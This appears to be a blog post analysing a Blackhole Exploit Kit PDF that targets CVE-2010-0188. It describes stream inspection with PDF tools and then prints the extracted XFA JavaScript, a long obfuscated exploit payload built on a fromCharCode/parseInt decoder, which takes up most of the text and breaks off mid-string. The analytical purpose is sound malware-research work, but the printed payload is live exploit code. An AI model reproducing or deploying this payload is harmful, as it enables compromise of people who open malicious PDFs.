Showing posts with label Python. Show all posts
Showing posts with label Python. Show all posts

Thursday, April 18, 2013

Blackhole Exploit Kit - deobfuscating the CVE-2010-0188 PDF


After looking at Styx pdf for cve-2010-0188 I thought it might be fun to take a quick look at the blackhole pdf cve-2010-0188 as well. How to fetch it is explained here.
I even managed to throw in a tiny piece of Python code, so we can enjoy some wiered Monty Python reference further down :)

Here is how it goes...

1. PDF overview



Lots of streams to look into. First lets check if pdf.py can give us more info and if threre is JavaScript in there somewhere.


No luck there. probably a JavaScript in there somewhere though so lets keep on looking.
Lets try to extract the streams with pdfextract:


hmmm no such luck. 
Let's go through it piece by piece with pyew then:



So a lot of gzipped content... Lets view the streams with pdfvi


Stream no 8. Bingo this looks like something worth investigating further.

2. The JavaScript from the PDF


<template><subform name="form1"><pageSet><pageArea><contentArea h="1O.5in" w="8in" x="O.25in" y="O.25in"></contentArea><medium long="11in" short="8.5in" stock="letter"></medium></pageArea></pageSet><subform h="1O.5in" w="8in"><field h="98.425mm" name="ImageField1" w="28.575mm" x="95.25mm" y="19.O5mm"><ui><imageEdit></imageEdit></ui><event activity="initialize" xmlns:xfa="http://testset.com">
<xfa:script contentType='application/x-javascript'>
if(ImageField1.rawValue===null)p="parseIn&#116;";
pp="&#1O2;romCharCode";
a='53**^!@#**48**4P**1L**4N**^!@#**48**4B**4B**4G**^!@#**4L**4E**2M**53**^!@#**48**4P**1L**49**^!@#**49**49**27**1L**^!@#**4A**4A**4A**27**^!@#**1L**4B**4B**4B**^!@#**27**1L**4C**4C**^!@#**4C**27**1L**4D**^!@#**4D**4D**27**1L**^!@#**4E**4E**4E**27**^!@#**1L**4F**4F**4F**^!@#**2M**53**48**4P**^!@#**1L**4N**4M**4G**^!@#**4L**51**4C**4P**^!@#**5O**46**48**27**^!@#**1L**4G**2M**53**^!@#**48**4P**1L**55**^!@#**1L**2O**1L**4L**^!@#**4C**54**1L**32**^!@#**4P**4P**48**56**^!@#**23**24**2M**53**^!@#**48**4P**1L**56**^!@#**1L**2O**1L**4L**^!@#**4C**54**1L**32**^!@#**4P**4P**48**56**^!@#**23**24**2M**53**^!@#**48**4P**1L**46**^!@#**4J**2C**2O**1N**^!@#**2F**4A**2D**2B**^!@#**2H**2B**2B**4D**^!@#**2B**2G**2C**2I**^!@#**2J**2B**2F**48**^!@#**2E**4A**2D**2B**^!@#**2H**2B**2B**4D**^!@#**2B**4D**2H**2E**^!@#**2J**2B**2F**48**^!@#**48**2E**4C**49**^!@#**2J**2B**2F**48**^!@#**2E**2B**2D**2B**^!@#**2J**2D**2F**48**^!@#**2H**4C**2D**4D**^!@#**2J**2B**2F**48**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**2D**2H**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2C**2D**2E**2K**^!@#**2J**2B**2F**48**^!@#**2H**2F**2D**2B**^!@#**2H**2B**2B**4D**^!@#**2B**2B**2B**2F**^!@#**2B**2B**2B**2B**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**1N**26**1N**2B**^!@#**2B**2B**2B**2G**^!@#**2H**2E**2H**4B**^!@#**2H**2K**2I**4B**^!@#**2E**4D**2H**2F**^!@#**2H**2E**2H**2H**^!@#**2D**2D**2H**4A**^!@#**2H**2J**2I**2E**^!@#**2H**2D**2H**4B**^!@#**2E**2F**2I**2F**^!@#**2H**2I**2H**2C**^!@#**2I**2H**2I**4C**^!@#**2H**2H**2D**2K**^!@#**2H**2C**2E**4B**^!@#**2E**2K**2H**4D**^!@#**2H**2G**2I**2E**^!@#**2I**2H**2D**4D**^!@#**2H**2C**2E**48**^!@#**2E**2C**2E**2E**^!@#**2E**48**2E**2H**^!@#**2I**2D**2E**48**^!@#**2E**4C**2H**2C**^!@#**2E**48**2E**4C**^!@#**2H**2C**2E**48**^!@#**2E**4C**2H**2C**^!@#**2E**48**2E**2E**^!@#**2E**2E**2E**48**^!@#**2E**2D**2E**2E**^!@#**2E**48**2E**4C**^!@#**2H**2C**2E**48**^!@#**2E**2I**2H**2C**^!@#**2E**4B**2E**2G**^!@#**2H**2B**2I**4D**^!@#**2H**2G**2H**2C**^!@#**2I**2G**2I**2H**^!@#**2H**4B**2H**2H**^!@#**2D**48**2H**2C**^!@#**2E**48**2E**2B**^!@#**2E**2E**2E**48**^!@#**2E**2K**2H**2C**^!@#**2E**48**2E**49**^!@#**2H**2C**2E**48**^!@#**2E**2J**2H**2C**^!@#**2E**4B**2E**2B**^!@#**2I**2E**2I**2H**^!@#**2H**4D**2E**2B**^!@#**2I**2J**2H**2B**^!@#**2I**4C**2D**2C**^!@#**2I**4D**2D**2E**^!@#**2H**2K**2E**2B**^!@#**2E**2F**2E**2K**^!@#**2E**2G**2E**2E**^!@#**2E**2D**2H**2F**^!@#**2H**2K**2E**2C**^!@#**2E**2G**2E**2E**^!@#**2E**2D**2E**2K**^!@#**2E**2C**2H**2J**^!@#**2E**2D**2H**2I**^!@#**2E**2K**2E**2F**^!@#**2H**2G**2E**2B**^!@#**2E**2E**2H**2C**^!@#**2H**2D**2E**2C**^!@#**2H**2D**2E**2C**^!@#**2H**2C**2H**2I**^!@#**2E**2D**2E**4D**^!@#**2D**2E**2H**2K**^!@#**2E**2B**2E**2F**^!@#**2E**2K**2E**2G**^!@#**2E**2E**2E**2D**^!@#**2H**2F**2H**2K**^!@#**2E**2C**2E**2G**^!@#**2E**2E**2E**2D**^!@#**2E**2K**2E**2C**^!@#**2H**2J**2E**2D**^!@#**2H**2I**2E**2K**^!@#**2E**2F**2H**2G**^!@#**2E**2B**2E**2E**^!@#**2H**2C**2H**2D**^!@#**2E**2C**2H**2D**^!@#**2E**2C**2H**2C**^!@#**2H**2I**2E**2D**^!@#**2E**4D**2D**2F**^!@#**2E**2G**2E**4C**^!@#**2D**2G**2E**2H**^!@#**2E**4C**2D**2C**^!@#**2E**2D**2E**2C**^!@#**2E**4C**2D**2K**^!@#**2E**2D**2E**2C**^!@#**2E**4D**2D**4D**^!@#**2D**48**2E**2B**^!@#**2I**2F**2I**2F**^!@#**2I**2J**2H**2B**^!@#**2I**4D**2D**48**^!@#**2C**2H**2E**2K**^!@#**2I**2H**2F**2H**^!@#**4A**49**2C**49**^!@#**2G**48**2J**48**^!@#**4A**2E**2E**4B**^!@#**49**2C**2B**4D**^!@#**2H**2K**2J**4C**^!@#**2B**48**2J**4C**^!@#**4D**2J**2K**4A**^!@#**4C**4C**2B**4C**^!@#**2F**4C**2J**4D**^!@#**4D**4D**4D**4C**^!@#**4D**4A**2K**2J**^!@#**4C**2J**2B**2H**^!@#**2G**4D**4D**4C**^!@#**4D**48**2H**2B**^!@#**2B**48**2H**2F**^!@#**4A**2G**2I**2B**^!@#**2B**4D**2E**2B**^!@#**2J**2I**2F**48**^!@#**4D**2G**2I**2B**^!@#**2B**4D**2E**2B**^!@#**2J**2I**2F**2E**^!@#**2C**49**4C**2D**^!@#**2B**49**4C**4A**^!@#**2B**2E**4A**2E**^!@#**2J**2F**2B**2H**^!@#**2G**4D**4D**2E**^!@#**2G**4A**2B**49**^!@#**4C**2E**2J**2B**^!@#**2B**48**2H**2F**^!@#**2B**2H**2G**4D**^!@#**4D**2E**2G**2B**^!@#**2B**48**2H**2H**^!@#**2C**2G**2I**2B**^!@#**4A**2G**2J**2F**^!@#**2C**2H**2G**4D**^!@#**4D**2B**2B**48**^!@#**2H**2I**2G**2E**^!@#**2G**2B**2B**48**^!@#**2H**2B**2B**48**^!@#**2H**2C**2G**2C**^!@#**2F**2F**2B**4B**^!@#**2C**2F**2F**2J**^!@#**2J**2B**2E**2F**^!@#**2B**2C**4A**48**^!@#**2J**2K**2G**2B**^!@#**2B**2K**2B**4B**^!@#**2C**2F**2F**2H**^!@#**4A**4A**2H**4A**^!@#**2H**2F**2H**4C**^!@#**2D**2G**2B**4B**^!@#**2C**2F**2F**2I**^!@#**4A**2F**2I**2D**^!@#**2H**2B**2I**2I**^!@#**2I**2B**2B**4B**^!@#**2C**2F**2F**2I**^!@#**4A**2C**2G**2K**^!@#**4A**2E**2E**2J**^!@#**4C**49**2J**4A**^!@#**2B**2H**2G**4D**^!@#**4D**2B**2B**2B**^!@#**2B**2B**2B**2J**^!@#**4D**2J**2H**2E**^!@#**2G**2B**2D**2E**^!@#**2I**4B**2D**2B**^!@#**2D**2J**2B**2F**^!@#**2D**2F**2F**2I**^!@#**4A**2D**2E**2E**^!@#**2E**2D**2I**2H**^!@#**2I**2F**2B**2F**^!@#**2D**2F**2F**2I**^!@#**4A**2E**2I**2I**^!@#**2H**2G**2H**2D**^!@#**2I**2F**2D**2F**^!@#**2B**2I**4A**4A**^!@#**2B**2F**2D**4A**^!@#**2G**4B**2J**2B**^!@#**2B**2B**2B**2C**^!@#**2B**2F**2B**4A**^!@#**4C**2C**2J**2D**^!@#**2I**49**4C**2D**^!@#**2B**49**4C**4D**^!@#**4D**4D**4D**4D**^!@#**4D**2C**2H**2J**^!@#**4C**2J**4C**49**^!@#**2J**2J**2B**2F**^!@#**4A**2E**2J**2H**^!@#**2C**4D**4D**2F**^!@#**2G**4B**2H**4A**^!@#**2H**2D**2I**2G**^!@#**2I**2J**2H**2B**^!@#**2B**2B**2B**4C**^!@#**2H**4D**2H**2J**^!@#**2H**2E**4C**4D**^!@#**4D**2G**2B**2E**^!@#**4A**2E**2J**2B**^!@#**2C**4C**2G**49**^!@#**2J**4A**4C**49**^!@#**2J**2G**2G**2B**^!@#**2G**2K**2C**2B**^!@#**4A**2E**2J**2B**^!@#**2G**2B**2B**2B**^!@#**2B**2B**2B**4D**^!@#**4D**2J**2H**2B**^!@#**2F**48**2H**2B**^!@#**2G**2J**2G**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2J**^!@#**4C**2K**4D**2D**^!@#**4C**4D**4D**4D**^!@#**4D**4D**4D**2J**^!@#**2K**2J**4C**2K**^!@#**2G**2G**2B**48**^!@#**2H**2I**4D**49**^!@#**2J**2J**2B**2J**^!@#**2H**49**2J**2E**^!@#**4D**49**4C**2H**^!@#**2K**2E**2B**2F**^!@#**2I**2E**2E**4A**^!@#**2B**4B**2I**2B**^!@#**2J**2B**2D**2J**^!@#**2H**49**2J**4B**^!@#**48**2E**2G**49**^!@#**4C**2E**4A**2K**^!@#**2G**4C**2G**49**^!@#**48**2G**4A**2E**^!@#**2B**49**2J**2F**^!@#**2B**49**2J**4B**^!@#**4B**2E**2B**2J**^!@#**4B**49**2J**4A**^!@#**2B**2F**2D**2F**^!@#**2G**4D**4D**4A**^!@#**4C**2H**2F**4B**^!@#**2J**49**2F**4A**^!@#**2B**49**2J**2H**^!@#**2H**4B**4B**2E**^!@#**2B**2F**2D**4C**^!@#**2G**49**2J**4C**^!@#**2G**2H**4C**2G**^!@#**2I**4D**2C**49**^!@#**2E**2C**4D**49**^!@#**4C**2B**2F**48**^!@#**4B**2E**2B**4B**^!@#**2B**49**4A**2C**^!@#**4A**2J**2B**2F**^!@#**2I**2D**4D**2J**^!@#**2E**2B**2C**4C**^!@#**49**4D**2B**49**^!@#**4B**2E**2E**2G**^!@#**4A**2E**2B**4B**^!@#**48**4A**4D**2C**^!@#**2F**2K**2F**2K**^!@#**4A**2E**2E**2G**^!@#**4D**2E**2B**2B**^!@#**2D**2H**2I**49**^!@#**2J**2H**2G**2G**^!@#**4D**2E**2B**2J**^!@#**2I**2G**2E**2F**^!@#**2I**49**2J**4A**^!@#**2E**2G**2I**49**^!@#**2J**2H**2G**2C**^!@#**2G**4A**2F**49**^!@#**4C**2K**4C**2C**^!@#**2G**2G**2I**2F**^!@#**4C**2G**2J**2F**^!@#**2D**2F**2E**2I**^!@#**2J**49**4D**2G**^!@#**2I**2H**2B**2K**^!@#**2E**2H**2F**2E**^!@#**4A**2B**2E**2B**^!@#**2F**49**2J**2J**^!@#**49**4D**4D**4D**^!@#**4D**2B**2C**2G**^!@#**2C**4C**4C**2C**^!@#**2J**4A**2D**2E**^!@#**2E**2F**2I**2E**^!@#**2B**4A**2E**4C**^!@#**2G**49**2J**2H**^!@#**2H**49**4B**2E**^!@#**2E**2J**2B**2H**^!@#**2I**49**2J**2H**^!@#**2G**4A**2C**2B**^!@#**2I**49**2J**4A**^!@#**2B**2B**2F**49**^!@#**2J**2B**2E**2B**^!@#**2F**49**2J**2F**^!@#**2H**2B**4A**2E**^!@#**2E**4D**2G**2K**^!@#**4C**2F**2E**2G**^!@#**2I**2F**4C**2G**^!@#**2J**4A**4D**4A**^!@#**4D**2F**4C**2E**^!@#**2J**2H**2H**1N**^!@#**29**5O**4N**4J**^!@#**4G**51**23**22**^!@#**22**24**29**4P**^!@#**4C**53**4C**4P**^!@#**5O**4C**23**24**^!@#**29**4H**4M**4G**^!@#**4L**23**22**22**^!@#**24**29**4P**4C**^!@#**4N**4J**48**4A**^!@#**4C**23**2A**2M**^!@#**2A**4E**27**22**^!@#**22**24**2M**53**^!@#**48**4P**1L**46**^!@#**4J**2D**2O**1N**^!@#**2F**4A**2D**2B**^!@#**2H**2B**2B**4D**^!@#**48**2G**2H**2E**^!@#**2J**2B**2F**48**^!@#**2E**4A**2D**2B**^!@#**2H**2B**2B**4D**^!@#**2K**2H**2D**2C**^!@#**2J**2B**2F**48**^!@#**2K**2B**2C**4D**^!@#**2J**2B**2F**48**^!@#**2E**2B**2K**2B**^!@#**2J**2F**2F**48**^!@#**2I**4B**2I**4C**^!@#**2J**2B**2F**48**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**2D**2H**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2I**2C**2J**2J**^!@#**2J**2B**2F**48**^!@#**2H**2F**2D**2B**^!@#**2H**2B**2B**4D**^!@#**2B**2B**2B**2F**^!@#**2B**2B**2B**2B**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**1N**26**1N**2B**^!@#**2B**2B**2B**2G**^!@#**2H**2E**2H**4B**^!@#**2H**2K**2I**4B**^!@#**2E**4D**2H**2F**^!@#**2H**2E**2H**2H**^!@#**2D**2D**2H**4A**^!@#**2H**2J**2I**2E**^!@#**2H**2D**2H**4B**^!@#**2E**2F**2I**2F**^!@#**2H**2I**2H**2C**^!@#**2I**2H**2I**4C**^!@#**2H**2H**2D**2K**^!@#**2H**2C**2E**4B**^!@#**2E**2K**2H**4D**^!@#**2H**2G**2I**2E**^!@#**2I**2H**2D**4D**^!@#**2H**2C**2E**48**^!@#**2E**2C**2E**2E**^!@#**2E**48**2E**2H**^!@#**2I**2D**2E**48**^!@#**2E**4C**2H**2C**^!@#**2E**48**2E**4C**^!@#**2H**2C**2E**48**^!@#**2E**4C**2H**2C**^!@#**2E**48**2E**2E**^!@#**2E**2E**2E**48**^!@#**2E**2D**2E**2E**^!@#**2E**48**2E**4C**^!@#**2H**2C**2E**48**^!@#**2E**2I**2H**2C**^!@#**2E**4B**2E**2G**^!@#**2H**2B**2I**4D**^!@#**2H**2G**2H**2C**^!@#**2I**2G**2I**2H**^!@#**2H**4B**2H**2H**^!@#**2D**48**2H**2C**^!@#**2E**48**2E**2B**^!@#**2E**2E**2E**48**^!@#**2E**2K**2H**2C**^!@#**2E**48**2E**49**^!@#**2H**2C**2E**48**^!@#**2E**2J**2H**2C**^!@#**2E**4B**2E**2B**^!@#**2I**2E**2I**2H**^!@#**2H**4D**2E**2B**^!@#**2I**2J**2H**2B**^!@#**2I**4C**2D**2C**^!@#**2I**4D**2D**2E**^!@#**2H**2K**2E**2B**^!@#**2E**2F**2E**2K**^!@#**2E**2G**2E**2E**^!@#**2E**2D**2H**2F**^!@#**2H**2K**2E**2C**^!@#**2E**2G**2E**2E**^!@#**2E**2D**2E**2K**^!@#**2E**2C**2H**2J**^!@#**2E**2D**2H**2I**^!@#**2E**2K**2E**2F**^!@#**2H**2G**2E**2B**^!@#**2E**2E**2H**2C**^!@#**2H**2D**2E**2C**^!@#**2H**2D**2E**2C**^!@#**2H**2C**2H**2I**^!@#**2E**2D**2E**4D**^!@#**2D**2E**2H**2K**^!@#**2E**2B**2E**2F**^!@#**2E**2K**2E**2G**^!@#**2E**2E**2E**2D**^!@#**2H**2F**2H**2K**^!@#**2E**2C**2E**2G**^!@#**2E**2E**2E**2D**^!@#**2E**2K**2E**2C**^!@#**2H**2J**2E**2D**^!@#**2H**2I**2E**2K**^!@#**2E**2F**2H**2G**^!@#**2E**2B**2E**2E**^!@#**2H**2C**2H**2D**^!@#**2E**2C**2H**2D**^!@#**2E**2C**2H**2C**^!@#**2H**2I**2E**2D**^!@#**2E**4D**2D**2F**^!@#**2E**2G**2E**4C**^!@#**2D**2G**2E**2H**^!@#**2E**4C**2D**2C**^!@#**2E**2D**2E**2C**^!@#**2E**4C**2D**2K**^!@#**2E**2D**2E**2C**^!@#**2E**4D**2D**4D**^!@#**2D**48**2E**2B**^!@#**2I**2F**2I**2F**^!@#**2I**2J**2H**2B**^!@#**2I**4D**2D**48**^!@#**2C**2H**2E**2K**^!@#**2I**2H**2F**2H**^!@#**4A**49**2C**49**^!@#**2G**48**2J**48**^!@#**4A**2E**2E**4B**^!@#**49**2C**2B**4D**^!@#**2H**2K**2J**4C**^!@#**2B**48**2J**4C**^!@#**4D**2J**2K**4A**^!@#**4C**4C**2B**4C**^!@#**2F**4C**2J**4D**^!@#**4D**4D**4D**4C**^!@#**4D**4A**2K**2J**^!@#**4C**2J**2B**2H**^!@#**2G**4D**4D**4C**^!@#**4D**48**2H**2B**^!@#**2B**48**2H**2F**^!@#**4A**2G**2I**2B**^!@#**2B**4D**2E**2B**^!@#**2J**2I**2F**48**^!@#**4D**2G**2I**2B**^!@#**2B**4D**2E**2B**^!@#**2J**2I**2F**2E**^!@#**2C**49**4C**2D**^!@#**2B**49**4C**4A**^!@#**2B**2E**4A**2E**^!@#**2J**2F**2B**2H**^!@#**2G**4D**4D**2E**^!@#**2G**4A**2B**49**^!@#**4C**2E**2J**2B**^!@#**2B**48**2H**2F**^!@#**2B**2H**2G**4D**^!@#**4D**2E**2G**2B**^!@#**2B**48**2H**2H**^!@#**2C**2G**2I**2B**^!@#**4A**2G**2J**2F**^!@#**2C**2H**2G**4D**^!@#**4D**2B**2B**48**^!@#**2H**2I**2G**2E**^!@#**2G**2B**2B**48**^!@#**2H**2B**2B**48**^!@#**2H**2C**2G**2C**^!@#**2F**2F**2B**4B**^!@#**2C**2F**2F**2J**^!@#**2J**2B**2E**2F**^!@#**2B**2C**4A**48**^!@#**2J**2K**2G**2B**^!@#**2B**2K**2B**4B**^!@#**2C**2F**2F**2H**^!@#**4A**4A**2H**4A**^!@#**2H**2F**2H**4C**^!@#**2D**2G**2B**4B**^!@#**2C**2F**2F**2I**^!@#**4A**2F**2I**2D**^!@#**2H**2B**2I**2I**^!@#**2I**2B**2B**4B**^!@#**2C**2F**2F**2I**^!@#**4A**2C**2G**2K**^!@#**4A**2E**2E**2J**^!@#**4C**49**2J**4A**^!@#**2B**2H**2G**4D**^!@#**4D**2B**2B**2B**^!@#**2B**2B**2B**2J**^!@#**4D**2J**2H**2E**^!@#**2G**2B**2D**2E**^!@#**2I**4B**2D**2B**^!@#**2D**2J**2B**2F**^!@#**2D**2F**2F**2I**^!@#**4A**2D**2E**2E**^!@#**2E**2D**2I**2H**^!@#**2I**2F**2B**2F**^!@#**2D**2F**2F**2I**^!@#**4A**2E**2I**2I**^!@#**2H**2G**2H**2D**^!@#**2I**2F**2D**2F**^!@#**2B**2I**4A**4A**^!@#**2B**2F**2D**4A**^!@#**2G**4B**2J**2B**^!@#**2B**2B**2B**2C**^!@#**2B**2F**2B**4A**^!@#**4C**2C**2J**2D**^!@#**2I**49**4C**2D**^!@#**2B**49**4C**4D**^!@#**4D**4D**4D**4D**^!@#**4D**2C**2H**2J**^!@#**4C**2J**4C**49**^!@#**2J**2J**2B**2F**^!@#**4A**2E**2J**2H**^!@#**2C**4D**4D**2F**^!@#**2G**4B**2H**4A**^!@#**2H**2D**2I**2G**^!@#**2I**2J**2H**2B**^!@#**2B**2B**2B**4C**^!@#**2H**4D**2H**2J**^!@#**2H**2E**4C**4D**^!@#**4D**2G**2B**2E**^!@#**4A**2E**2J**2B**^!@#**2C**4C**2G**49**^!@#**2J**4A**4C**49**^!@#**2J**2G**2G**2B**^!@#**2G**2K**2C**2B**^!@#**4A**2E**2J**2B**^!@#**2G**2B**2B**2B**^!@#**2B**2B**2B**4D**^!@#**4D**2J**2H**2B**^!@#**2F**48**2H**2B**^!@#**2G**2J**2G**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2J**^!@#**4C**2K**4D**2D**^!@#**4C**4D**4D**4D**^!@#**4D**4D**4D**2J**^!@#**2K**2J**4C**2K**^!@#**2G**2G**2B**48**^!@#**2H**2I**4D**49**^!@#**2J**2J**2B**2J**^!@#**2H**49**2J**2E**^!@#**4D**49**4C**2H**^!@#**2K**2E**2B**2F**^!@#**2I**2E**2E**4A**^!@#**2B**4B**2I**2B**^!@#**2J**2B**2D**2J**^!@#**2H**49**2J**4B**^!@#**48**2E**2G**49**^!@#**4C**2E**4A**2K**^!@#**2G**4C**2G**49**^!@#**48**2G**4A**2E**^!@#**2B**49**2J**2F**^!@#**2B**49**2J**4B**^!@#**4B**2E**2B**2J**^!@#**4B**49**2J**4A**^!@#**2B**2F**2D**2F**^!@#**2G**4D**4D**4A**^!@#**4C**2H**2F**4B**^!@#**2J**49**2F**4A**^!@#**2B**49**2J**2H**^!@#**2H**4B**4B**2E**^!@#**2B**2F**2D**4C**^!@#**2G**49**2J**4C**^!@#**2G**2H**4C**2G**^!@#**2I**4D**2C**49**^!@#**2E**2C**4D**49**^!@#**4C**2B**2F**48**^!@#**4B**2E**2B**4B**^!@#**2B**49**4A**2C**^!@#**4A**2J**2B**2F**^!@#**2I**2D**4D**2J**^!@#**2E**2B**2C**4C**^!@#**49**4D**2B**49**^!@#**4B**2E**2E**2G**^!@#**4A**2E**2B**4B**^!@#**48**4A**4D**2C**^!@#**2F**2K**2F**2K**^!@#**4A**2E**2E**2G**^!@#**4D**2E**2B**2B**^!@#**2D**2H**2I**49**^!@#**2J**2H**2G**2G**^!@#**4D**2E**2B**2J**^!@#**2I**2G**2E**2F**^!@#**2I**49**2J**4A**^!@#**2E**2G**2I**49**^!@#**2J**2H**2G**2C**^!@#**2G**4A**2F**49**^!@#**4C**2K**4C**2C**^!@#**2G**2G**2I**2F**^!@#**4C**2G**2J**2F**^!@#**2D**2F**2E**2I**^!@#**2J**49**4D**2G**^!@#**2I**2H**2B**2K**^!@#**2E**2H**2F**2E**^!@#**4A**2B**2E**2B**^!@#**2F**49**2J**2J**^!@#**49**4D**4D**4D**^!@#**4D**2B**2C**2G**^!@#**2C**4C**4C**2C**^!@#**2J**4A**2D**2E**^!@#**2E**2F**2I**2E**^!@#**2B**4A**2E**4C**^!@#**2G**49**2J**2H**^!@#**2H**49**4B**2E**^!@#**2E**2J**2B**2H**^!@#**2I**49**2J**2H**^!@#**2G**4A**2C**2B**^!@#**2I**49**2J**4A**^!@#**2B**2B**2F**49**^!@#**2J**2B**2E**2B**^!@#**2F**49**2J**2F**^!@#**2H**2B**4A**2E**^!@#**2E**4D**2G**2K**^!@#**4C**2F**2E**2G**^!@#**2I**2F**4C**2G**^!@#**2J**4A**4D**4A**^!@#**4D**2F**4C**2E**^!@#**2J**2H**2H**1N**^!@#**29**5O**4N**4J**^!@#**4G**51**23**22**^!@#**22**24**29**4P**^!@#**4C**53**4C**4P**^!@#**5O**4C**23**24**^!@#**29**4H**4M**4G**^!@#**4L**23**22**22**^!@#**24**29**4P**4C**^!@#**4N**4J**48**4A**^!@#**4C**23**2A**2M**^!@#**2A**4E**27**22**^!@#**22**24**2M**46**^!@#**4J**2E**2O**48**^!@#**4N**4N**2M**46**^!@#**4J**2F**2O**4L**^!@#**4C**54**1L**32**^!@#**4P**4P**48**56**^!@#**23**24**2M**4D**^!@#**52**4L**4A**51**^!@#**4G**4M**4L**1L**^!@#**46**4J**2G**23**^!@#**24**58**53**48**^!@#**4P**1L**46**4J**^!@#**2H**2O**46**4J**^!@#**2E**29**53**4G**^!@#**4C**54**4C**4P**^!@#**3N**4C**4P**5O**^!@#**4G**4M**4L**29**^!@#**51**4M**3K**51**^!@#**4P**4G**4L**4E**^!@#**23**24**2M**46**^!@#**4J**2H**2O**46**^!@#**4J**2H**29**4P**^!@#**4C**4N**4J**48**^!@#**4A**4C**23**22**^!@#**29**22**27**22**^!@#**22**24**2M**54**^!@#**4F**4G**4J**4C**^!@#**23**46**4J**2H**^!@#**29**4J**4C**4L**^!@#**4E**51**4F**2N**^!@#**2F**24**46**4J**^!@#**2H**26**2O**22**^!@#**2B**22**2M**4P**^!@#**4C**51**52**4P**^!@#**4L**1L**4N**48**^!@#**4P**5O**4C**3A**^!@#**4L**51**23**46**^!@#**4J**2H**27**2C**^!@#**2B**24**5A**4D**^!@#**52**4L**4A**51**^!@#**4G**4M**4L**1L**^!@#**46**4J**2I**23**^!@#**46**4J**2J**27**^!@#**46**4J**2K**24**^!@#**58**54**4F**4G**^!@#**4J**4C**23**46**^!@#**4J**2J**29**4J**^!@#**4C**4L**4E**51**^!@#**4F**25**2D**2N**^!@#**46**4J**2K**24**^!@#**46**4J**2J**26**^!@#**2O**46**4J**2J**^!@#**2M**4P**4C**51**^!@#**52**4P**4L**1L**^!@#**46**4J**2J**29**^!@#**5O**52**49**5O**^!@#**51**4P**4G**4L**^!@#**4E**23**2B**27**^!@#**46**4J**2K**2A**^!@#**2D**24**5A**4D**^!@#**52**4L**4A**51**^!@#**4G**4M**4L**1L**^!@#**46**3A**2B**23**^!@#**46**3A**2C**24**^!@#**58**46**3A**2C**^!@#**2O**52**4L**4C**^!@#**5O**4A**48**4N**^!@#**4C**23**46**3A**^!@#**2C**24**2M**4P**^!@#**4M**51**4C**35**^!@#**48**4I**2O**46**^!@#**3A**2C**29**4J**^!@#**4C**4L**4E**51**^!@#**4F**25**2D**2M**^!@#**4B**48**4I**3J**^!@#**4M**51**4C**2O**^!@#**52**4L**4C**5O**^!@#**4A**48**4N**4C**^!@#**23**22**2O**52**^!@#**2K**2B**2K**2B**^!@#**22**24**2M**5O**^!@#**4N**4P**48**56**^!@#**2O**46**4J**2I**^!@#**23**4B**48**4I**^!@#**3J**4M**51**4C**^!@#**27**2B**55**2D**^!@#**2B**2B**2B**28**^!@#**4P**4M**51**4C**^!@#**35**48**4I**24**^!@#**2M**4J**4M**55**^!@#**3O**4F**4C**4C**^!@#**2O**46**3A**2C**^!@#**26**5O**4N**4P**^!@#**48**56**2M**4J**^!@#**4M**55**3O**4F**^!@#**4C**4C**2O**46**^!@#**4J**2I**23**4J**^!@#**4M**55**3O**4F**^!@#**4C**4C**27**2G**^!@#**2D**2F**2B**2K**^!@#**2J**24**2M**4D**^!@#**4M**4P**23**4G**^!@#**2O**2B**2M**1L**^!@#**4G**1L**2N**1L**^!@#**2F**2B**2B**2M**^!@#**1L**4G**26**26**^!@#**24**46**4J**2F**^!@#**42**4G**44**2O**^!@#**4J**4M**55**3O**^!@#**4F**4C**4C**29**^!@#**5O**52**49**5O**^!@#**51**4P**23**2B**^!@#**27**4J**4M**55**^!@#**3O**4F**4C**4C**^!@#**29**4J**4C**4L**^!@#**4E**51**4F**28**^!@#**2C**24**26**4B**^!@#**48**4I**3J**4M**^!@#**51**4C**2M**5A**^!@#**4D**52**4L**4A**^!@#**51**4G**4M**4L**^!@#**1L**46**3A**2D**^!@#**23**46**3A**2C**^!@#**27**4J**4C**4L**^!@#**24**58**54**4F**^!@#**4G**4J**4C**23**^!@#**46**3A**2C**29**^!@#**4J**4C**4L**4E**^!@#**51**4F**2N**4J**^!@#**4C**4L**24**46**^!@#**3A**2C**26**2O**^!@#**46**3A**2C**2M**^!@#**4P**4C**51**52**^!@#**4P**4L**1L**46**^!@#**3A**2C**29**5O**^!@#**52**49**5O**51**^!@#**4P**4G**4L**4E**^!@#**23**2B**27**4J**^!@#**4C**4L**24**5A**^!@#**4D**52**4L**4A**^!@#**51**4G**4M**4L**^!@#**1L**46**3A**2E**^!@#**23**46**3A**2C**^!@#**24**58**4P**4C**^!@#**51**2O**22**22**^!@#**2M**4D**4M**4P**^!@#**23**4G**2O**2B**^!@#**2M**4G**2N**46**^!@#**3A**2C**29**4J**^!@#**4C**4L**4E**51**^!@#**4F**2M**4G**26**^!@#**2O**2D**24**58**^!@#**49**2O**46**3A**^!@#**2C**29**5O**52**^!@#**49**5O**51**4P**^!@#**23**4G**27**2D**^!@#**24**2M**4A**2O**^!@#**4N**48**4P**5O**^!@#**4C**3A**4L**51**^!@#**23**49**27**2C**^!@#**2H**24**2M**4P**^!@#**4C**51**26**2O**^!@#**3K**51**4P**4G**^!@#**4L**4E**29**4D**^!@#**4P**4M**4K**34**^!@#**4F**48**4P**34**^!@#**4M**4B**4C**23**^!@#**4A**24**2M**5A**^!@#**4P**4C**51**52**^!@#**4P**4L**1L**4P**^!@#**4C**51**5A**4D**^!@#**52**4L**4A**51**^!@#**4G**4M**4L**1L**^!@#**46**4H**4G**2C**^!@#**23**46**3A**2C**^!@#**27**46**3A**2F**^!@#**24**58**46**3A**^!@#**2G**2O**2